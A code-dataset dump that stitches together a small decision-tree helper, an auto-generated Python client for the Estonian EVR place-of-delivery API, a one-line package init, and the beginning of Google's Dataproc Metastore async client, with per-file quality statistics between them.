def num_splits(self):
return len(self.resulting_class_distributions)
def resulting_class_distribution_from_split(self, split_idx):
return self.resulting_class_distributions[split_idx]
| 38.428571 | 89 | 0.745353 | 64 | 538 | 5.84375 | 0.3125 | 0.224599 | 0.360963 | 0.248663 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.19145 | 538 | 13 | 90 | 41.384615 | 0.85977 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.272727 | false | 0 | 0 | 0.181818 | 0.545455 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
ed23c77bcdb97e86d91c9552f1ef5eaf16962513 | 21,563 | py | Python | pyevr/openapi_client/api/place_of_deliveries_api.py | thorgate/pyevr | 168f2e9459020212213ed0291882a285ebb53839 | [
"MIT"
] | 3 | 2020-04-18T19:45:51.000Z | 2022-03-01T19:48:11.000Z | pyevr/openapi_client/api/place_of_deliveries_api.py | thorgate/pyevr | 168f2e9459020212213ed0291882a285ebb53839 | [
"MIT"
] | 39 | 2019-11-16T01:35:35.000Z | 2021-11-18T12:58:41.000Z | pyevr/openapi_client/api/place_of_deliveries_api.py | thorgate/pyevr | 168f2e9459020212213ed0291882a285ebb53839 | [
"MIT"
] | null | null | null | # coding: utf-8
"""
EVR API
OpenAPI Generator'i jaoks kohandatud EVR API kirjeldus. Kasuta seda juhul, kui spetsifikatsioonile vastava EVR API kirjeldusega ei õnnestu klienti genereerida. # noqa: E501
The version of the OpenAPI document: 1.8.0
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from pyevr.openapi_client.api_client import ApiClient
from pyevr.openapi_client.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class PlaceOfDeliveriesApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def place_of_deliveries_add_or_update(self, code, put_place_of_delivery_request, **kwargs): # noqa: E501
"""Tarnekoha lisamine ja muutmine # noqa: E501
Lisab uue tarnekoha. Kui antud koodiga tarnekoht juba eksisteerib, siis muudab olemasolevat tarnekohta. Loomisel märgitakse päringu tegija tarnekoha omanikuks. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.place_of_deliveries_add_or_update(code, put_place_of_delivery_request, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str code: Kood (required)
:param PutPlaceOfDeliveryRequest put_place_of_delivery_request: (required)
:param str evr_language: Defineerib keele tagastatavatele veateadetele (toetatud on väärtused \"et\" eesti keele ning \"en\" inglise keele jaoks).
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.place_of_deliveries_add_or_update_with_http_info(code, put_place_of_delivery_request, **kwargs) # noqa: E501
def place_of_deliveries_add_or_update_with_http_info(self, code, put_place_of_delivery_request, **kwargs): # noqa: E501
"""Tarnekoha lisamine ja muutmine # noqa: E501
Lisab uue tarnekoha. Kui antud koodiga tarnekoht juba eksisteerib, siis muudab olemasolevat tarnekohta. Loomisel märgitakse päringu tegija tarnekoha omanikuks. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.place_of_deliveries_add_or_update_with_http_info(code, put_place_of_delivery_request, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str code: Kood (required)
:param PutPlaceOfDeliveryRequest put_place_of_delivery_request: (required)
:param str evr_language: Defineerib keele tagastatavatele veateadetele (toetatud on väärtused \"et\" eesti keele ning \"en\" inglise keele jaoks).
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'code',
'put_place_of_delivery_request',
'evr_language'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method place_of_deliveries_add_or_update" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'code' is set
if self.api_client.client_side_validation and ('code' not in local_var_params or # noqa: E501
local_var_params['code'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `code` when calling `place_of_deliveries_add_or_update`") # noqa: E501
# verify the required parameter 'put_place_of_delivery_request' is set
if self.api_client.client_side_validation and ('put_place_of_delivery_request' not in local_var_params or # noqa: E501
local_var_params['put_place_of_delivery_request'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `put_place_of_delivery_request` when calling `place_of_deliveries_add_or_update`") # noqa: E501
collection_formats = {}
path_params = {}
if 'code' in local_var_params:
path_params['code'] = local_var_params['code'] # noqa: E501
query_params = []
header_params = {}
if 'evr_language' in local_var_params:
header_params['EVR-LANGUAGE'] = local_var_params['evr_language'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'put_place_of_delivery_request' in local_var_params:
body_params = local_var_params['put_place_of_delivery_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['SecretApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/placeofdeliveries/{code}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def place_of_deliveries_get(self, code, **kwargs): # noqa: E501
"""Tarnekoha pärimine # noqa: E501
Tagastab koodile vastava tarnekoha. Pärida saab ainult enda asutusele kuuluvat tarnekohta. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.place_of_deliveries_get(code, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str code: Päritava tarnekoha kood (tõstutundlik) (required)
:param str evr_language: Defineerib keele tagastatavatele veateadetele (toetatud on väärtused \"et\" eesti keele ning \"en\" inglise keele jaoks).
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: PlaceOfDelivery
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.place_of_deliveries_get_with_http_info(code, **kwargs) # noqa: E501
def place_of_deliveries_get_with_http_info(self, code, **kwargs): # noqa: E501
"""Tarnekoha pärimine # noqa: E501
Tagastab koodile vastava tarnekoha. Pärida saab ainult enda asutusele kuuluvat tarnekohta. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.place_of_deliveries_get_with_http_info(code, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str code: Päritava tarnekoha kood (tõstutundlik) (required)
:param str evr_language: Defineerib keele tagastatavatele veateadetele (toetatud on väärtused \"et\" eesti keele ning \"en\" inglise keele jaoks).
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(PlaceOfDelivery, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'code',
'evr_language'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method place_of_deliveries_get" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'code' is set
if self.api_client.client_side_validation and ('code' not in local_var_params or # noqa: E501
local_var_params['code'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `code` when calling `place_of_deliveries_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'code' in local_var_params:
path_params['code'] = local_var_params['code'] # noqa: E501
query_params = []
header_params = {}
if 'evr_language' in local_var_params:
header_params['EVR-LANGUAGE'] = local_var_params['evr_language'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['SecretApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/placeofdeliveries/{code}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PlaceOfDelivery', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def place_of_deliveries_list(self, **kwargs): # noqa: E501
"""Tarnekohtade pärimine # noqa: E501
Tagastab filtritele vastavad aktiivsed avalikud tarnekohad ja kõik ettevõttega seotud tarnekohad. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.place_of_deliveries_list(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name_contains: Filtreerib tarnekohad, mille nimi sisaldab otsinguterminit
:param str code_starts_with: Filtreerib tarnekohad, mille kood algab otsinguterminiga (tõstutundlik)
:param str register_code: Filtreerib ettevõtte tarnekohad, mille registrikood vastab otsinguterminile
:param str address: Vabatekstiline aadressi otsing. Toetatud on järgmine süntaks: * ilma jutumärkideta tekst: sõnade vahel rakendatakse loogiline JA * jutumärkides tekst: otsitakse jutumärkides olevat lauset * OR: loogiline VÕI operaator sõnade vahel * -: loogiline EITUS
:param int page: Tagastatav lehekülg
:param str evr_language: Defineerib keele tagastatavatele veateadetele (toetatud on väärtused \"et\" eesti keele ning \"en\" inglise keele jaoks).
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: PagedResultOfPlaceOfDelivery
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.place_of_deliveries_list_with_http_info(**kwargs) # noqa: E501
def place_of_deliveries_list_with_http_info(self, **kwargs): # noqa: E501
"""Tarnekohtade pärimine # noqa: E501
Tagastab filtritele vastavad aktiivsed avalikud tarnekohad ja kõik ettevõttega seotud tarnekohad. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.place_of_deliveries_list_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name_contains: Filtreerib tarnekohad, mille nimi sisaldab otsinguterminit
:param str code_starts_with: Filtreerib tarnekohad, mille kood algab otsinguterminiga (tõstutundlik)
:param str register_code: Filtreerib ettevõtte tarnekohad, mille registrikood vastab otsinguterminile
:param str address: Vabatekstiline aadressi otsing. Toetatud on järgmine süntaks: * ilma jutumärkideta tekst: sõnade vahel rakendatakse loogiline JA * jutumärkides tekst: otsitakse jutumärkides olevat lauset * OR: loogiline VÕI operaator sõnade vahel * -: loogiline EITUS
:param int page: Tagastatav lehekülg
:param str evr_language: Defineerib keele tagastatavatele veateadetele (toetatud on väärtused \"et\" eesti keele ning \"en\" inglise keele jaoks).
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(PagedResultOfPlaceOfDelivery, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name_contains',
'code_starts_with',
'register_code',
'address',
'page',
'evr_language'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method place_of_deliveries_list" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
if self.api_client.client_side_validation and 'page' in local_var_params and local_var_params['page'] > 2147483647: # noqa: E501
raise ApiValueError("Invalid value for parameter `page` when calling `place_of_deliveries_list`, must be a value less than or equal to `2147483647`") # noqa: E501
if self.api_client.client_side_validation and 'page' in local_var_params and local_var_params['page'] < 1: # noqa: E501
raise ApiValueError("Invalid value for parameter `page` when calling `place_of_deliveries_list`, must be a value greater than or equal to `1`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'name_contains' in local_var_params and local_var_params['name_contains'] is not None: # noqa: E501
query_params.append(('name_contains', local_var_params['name_contains'])) # noqa: E501
if 'code_starts_with' in local_var_params and local_var_params['code_starts_with'] is not None: # noqa: E501
query_params.append(('code_starts_with', local_var_params['code_starts_with'])) # noqa: E501
if 'register_code' in local_var_params and local_var_params['register_code'] is not None: # noqa: E501
query_params.append(('register_code', local_var_params['register_code'])) # noqa: E501
if 'address' in local_var_params and local_var_params['address'] is not None: # noqa: E501
query_params.append(('address', local_var_params['address'])) # noqa: E501
if 'page' in local_var_params and local_var_params['page'] is not None: # noqa: E501
query_params.append(('page', local_var_params['page'])) # noqa: E501
header_params = {}
if 'evr_language' in local_var_params:
header_params['EVR-LANGUAGE'] = local_var_params['evr_language'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['SecretApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/placeofdeliveries', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PagedResultOfPlaceOfDelivery', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
| 50.380841 | 279 | 0.633261 | 2,442 | 21,563 | 5.336609 | 0.119984 | 0.04113 | 0.065531 | 0.019644 | 0.907535 | 0.895104 | 0.886433 | 0.874079 | 0.838244 | 0.834101 | 0 | 0.015284 | 0.296063 | 21,563 | 427 | 280 | 50.498829 | 0.84327 | 0.476001 | 0 | 0.639024 | 0 | 0.009756 | 0.208957 | 0.070445 | 0 | 0 | 0 | 0 | 0 | 1 | 0.034146 | false | 0 | 0.02439 | 0 | 0.092683 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ed50a632874fbc3c8f6f2102150fe39432b002f8 | 26 | py | Python | modules/random_spam/__init__.py | plusterm/plusterm | 45e9382accdaae7d51c65cab77e571bc6d264936 | [
"MIT"
] | 2 | 2018-01-10T16:20:45.000Z | 2018-01-16T12:04:13.000Z | modules/random_spam/__init__.py | plusterm/plusterm | 45e9382accdaae7d51c65cab77e571bc6d264936 | [
"MIT"
] | 14 | 2018-01-10T12:56:43.000Z | 2018-05-11T16:28:31.000Z | modules/random_spam/__init__.py | plusterm/plusterm | 45e9382accdaae7d51c65cab77e571bc6d264936 | [
"MIT"
] | null | null | null | from .random_spam import * | 26 | 26 | 0.807692 | 4 | 26 | 5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.115385 | 26 | 1 | 26 | 26 | 0.869565 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
ed5444989da8642dd54702b1e7ee9d4d6ff15f32 | 67,883 | py | Python | google/cloud/metastore_v1/services/dataproc_metastore/async_client.py | LaudateCorpus1/python-dataproc-metastore | f8d7bb845079cb98a1f4d18ad68a6b3958541d51 | [
"Apache-2.0"
] | null | null | null | google/cloud/metastore_v1/services/dataproc_metastore/async_client.py | LaudateCorpus1/python-dataproc-metastore | f8d7bb845079cb98a1f4d18ad68a6b3958541d51 | [
"Apache-2.0"
] | null | null | null | google/cloud/metastore_v1/services/dataproc_metastore/async_client.py | LaudateCorpus1/python-dataproc-metastore | f8d7bb845079cb98a1f4d18ad68a6b3958541d51 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
import functools
import re
from typing import Dict, Optional, Sequence, Tuple, Type, Union
import pkg_resources
from google.api_core.client_options import ClientOptions
from google.api_core import exceptions as core_exceptions
from google.api_core import gapic_v1
from google.api_core import retry as retries
from google.auth import credentials as ga_credentials # type: ignore
from google.oauth2 import service_account # type: ignore
try:
OptionalRetry = Union[retries.Retry, gapic_v1.method._MethodDefault]
except AttributeError: # pragma: NO COVER
OptionalRetry = Union[retries.Retry, object] # type: ignore
from google.api_core import operation # type: ignore
from google.api_core import operation_async # type: ignore
from google.cloud.metastore_v1.services.dataproc_metastore import pagers
from google.cloud.metastore_v1.types import metastore
from google.protobuf import empty_pb2 # type: ignore
from google.protobuf import field_mask_pb2 # type: ignore
from google.protobuf import timestamp_pb2 # type: ignore
from .transports.base import DataprocMetastoreTransport, DEFAULT_CLIENT_INFO
from .transports.grpc_asyncio import DataprocMetastoreGrpcAsyncIOTransport
from .client import DataprocMetastoreClient
class DataprocMetastoreAsyncClient:
"""Configures and manages metastore services. Metastore services are
fully managed, highly available, autoscaled, autohealing, OSS-native
deployments of technical metadata management software. Each
metastore service exposes a network endpoint through which metadata
queries are served. Metadata queries can originate from a variety of
sources, including Apache Hive, Apache Presto, and Apache Spark.
The Dataproc Metastore API defines the following resource model:
- The service works with a collection of Google Cloud projects,
named: ``/projects/*``
- Each project has a collection of available locations, named:
``/locations/*`` (a location must refer to a Google Cloud
``region``)
- Each location has a collection of services, named:
``/services/*``
- Dataproc Metastore services are resources with names of the form:
``/projects/{project_number}/locations/{location_id}/services/{service_id}``.
"""
_client: DataprocMetastoreClient
DEFAULT_ENDPOINT = DataprocMetastoreClient.DEFAULT_ENDPOINT
DEFAULT_MTLS_ENDPOINT = DataprocMetastoreClient.DEFAULT_MTLS_ENDPOINT
backup_path = staticmethod(DataprocMetastoreClient.backup_path)
parse_backup_path = staticmethod(DataprocMetastoreClient.parse_backup_path)
metadata_import_path = staticmethod(DataprocMetastoreClient.metadata_import_path)
parse_metadata_import_path = staticmethod(
DataprocMetastoreClient.parse_metadata_import_path
)
network_path = staticmethod(DataprocMetastoreClient.network_path)
parse_network_path = staticmethod(DataprocMetastoreClient.parse_network_path)
service_path = staticmethod(DataprocMetastoreClient.service_path)
parse_service_path = staticmethod(DataprocMetastoreClient.parse_service_path)
common_billing_account_path = staticmethod(
DataprocMetastoreClient.common_billing_account_path
)
parse_common_billing_account_path = staticmethod(
DataprocMetastoreClient.parse_common_billing_account_path
)
common_folder_path = staticmethod(DataprocMetastoreClient.common_folder_path)
parse_common_folder_path = staticmethod(
DataprocMetastoreClient.parse_common_folder_path
)
common_organization_path = staticmethod(
DataprocMetastoreClient.common_organization_path
)
parse_common_organization_path = staticmethod(
DataprocMetastoreClient.parse_common_organization_path
)
common_project_path = staticmethod(DataprocMetastoreClient.common_project_path)
parse_common_project_path = staticmethod(
DataprocMetastoreClient.parse_common_project_path
)
common_location_path = staticmethod(DataprocMetastoreClient.common_location_path)
parse_common_location_path = staticmethod(
DataprocMetastoreClient.parse_common_location_path
)
@classmethod
def from_service_account_info(cls, info: dict, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
info.
Args:
info (dict): The service account private key info.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
DataprocMetastoreAsyncClient: The constructed client.
"""
return DataprocMetastoreClient.from_service_account_info.__func__(DataprocMetastoreAsyncClient, info, *args, **kwargs) # type: ignore
@classmethod
def from_service_account_file(cls, filename: str, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
DataprocMetastoreAsyncClient: The constructed client.
"""
return DataprocMetastoreClient.from_service_account_file.__func__(DataprocMetastoreAsyncClient, filename, *args, **kwargs) # type: ignore
from_service_account_json = from_service_account_file
@classmethod
def get_mtls_endpoint_and_cert_source(
cls, client_options: Optional[ClientOptions] = None
):
"""Return the API endpoint and client cert source for mutual TLS.
The client cert source is determined in the following order:
(1) if `GOOGLE_API_USE_CLIENT_CERTIFICATE` environment variable is not "true", the
client cert source is None.
(2) if `client_options.client_cert_source` is provided, use the provided one; if the
default client cert source exists, use the default one; otherwise the client cert
source is None.
The API endpoint is determined in the following order:
(1) if `client_options.api_endpoint` if provided, use the provided one.
(2) if `GOOGLE_API_USE_CLIENT_CERTIFICATE` environment variable is "always", use the
default mTLS endpoint; if the environment variabel is "never", use the default API
endpoint; otherwise if client cert source exists, use the default mTLS endpoint, otherwise
use the default API endpoint.
More details can be found at https://google.aip.dev/auth/4114.
Args:
client_options (google.api_core.client_options.ClientOptions): Custom options for the
client. Only the `api_endpoint` and `client_cert_source` properties may be used
in this method.
Returns:
Tuple[str, Callable[[], Tuple[bytes, bytes]]]: returns the API endpoint and the
client cert source to use.
Raises:
google.auth.exceptions.MutualTLSChannelError: If any errors happen.
"""
return DataprocMetastoreClient.get_mtls_endpoint_and_cert_source(client_options) # type: ignore
@property
def transport(self) -> DataprocMetastoreTransport:
"""Returns the transport used by the client instance.
Returns:
DataprocMetastoreTransport: The transport used by the client instance.
"""
return self._client.transport
get_transport_class = functools.partial(
type(DataprocMetastoreClient).get_transport_class, type(DataprocMetastoreClient)
)
def __init__(
self,
*,
credentials: ga_credentials.Credentials = None,
transport: Union[str, DataprocMetastoreTransport] = "grpc_asyncio",
client_options: ClientOptions = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiates the dataproc metastore client.
Args:
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
transport (Union[str, ~.DataprocMetastoreTransport]): The
transport to use. If set to None, a transport is chosen
automatically.
client_options (ClientOptions): Custom options for the client. It
won't take effect if a ``transport`` instance is provided.
(1) The ``api_endpoint`` property can be used to override the
default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT
environment variable can also be used to override the endpoint:
"always" (always use the default mTLS endpoint), "never" (always
use the default regular endpoint) and "auto" (auto switch to the
default mTLS endpoint if client certificate is present, this is
the default value). However, the ``api_endpoint`` property takes
precedence if provided.
(2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable
is "true", then the ``client_cert_source`` property can be used
to provide client certificate for mutual TLS transport. If
not provided, the default SSL client certificate will be used if
present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not
set, no client certificate will be used.
Raises:
google.auth.exceptions.MutualTlsChannelError: If mutual TLS transport
creation failed for any reason.
"""
self._client = DataprocMetastoreClient(
credentials=credentials,
transport=transport,
client_options=client_options,
client_info=client_info,
)
async def list_services(
self,
request: Union[metastore.ListServicesRequest, dict] = None,
*,
parent: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.ListServicesAsyncPager:
r"""Lists services in a project and location.
Args:
request (Union[google.cloud.metastore_v1.types.ListServicesRequest, dict]):
The request object. Request message for
[DataprocMetastore.ListServices][google.cloud.metastore.v1.DataprocMetastore.ListServices].
parent (:class:`str`):
Required. The relative resource name of the location of
metastore services to list, in the following form:
``projects/{project_number}/locations/{location_id}``.
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.metastore_v1.services.dataproc_metastore.pagers.ListServicesAsyncPager:
Response message for
[DataprocMetastore.ListServices][google.cloud.metastore.v1.DataprocMetastore.ListServices].
Iterating over this object will yield results and
resolve additional pages automatically.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = metastore.ListServicesRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.list_services,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# This method is paged; wrap the response in a pager, which provides
# an `__aiter__` convenience method.
response = pagers.ListServicesAsyncPager(
method=rpc, request=request, response=response, metadata=metadata,
)
# Done; return the response.
return response
async def get_service(
self,
request: Union[metastore.GetServiceRequest, dict] = None,
*,
name: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> metastore.Service:
r"""Gets the details of a single service.
Args:
request (Union[google.cloud.metastore_v1.types.GetServiceRequest, dict]):
The request object. Request message for
[DataprocMetastore.GetService][google.cloud.metastore.v1.DataprocMetastore.GetService].
name (:class:`str`):
Required. The relative resource name of the metastore
service to retrieve, in the following form:
``projects/{project_number}/locations/{location_id}/services/{service_id}``.
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.metastore_v1.types.Service:
A managed metastore service that
serves metadata queries.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = metastore.GetServiceRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.get_service,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
async def create_service(
self,
request: Union[metastore.CreateServiceRequest, dict] = None,
*,
parent: str = None,
service: metastore.Service = None,
service_id: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation_async.AsyncOperation:
r"""Creates a metastore service in a project and
location.
Args:
request (Union[google.cloud.metastore_v1.types.CreateServiceRequest, dict]):
The request object. Request message for
[DataprocMetastore.CreateService][google.cloud.metastore.v1.DataprocMetastore.CreateService].
parent (:class:`str`):
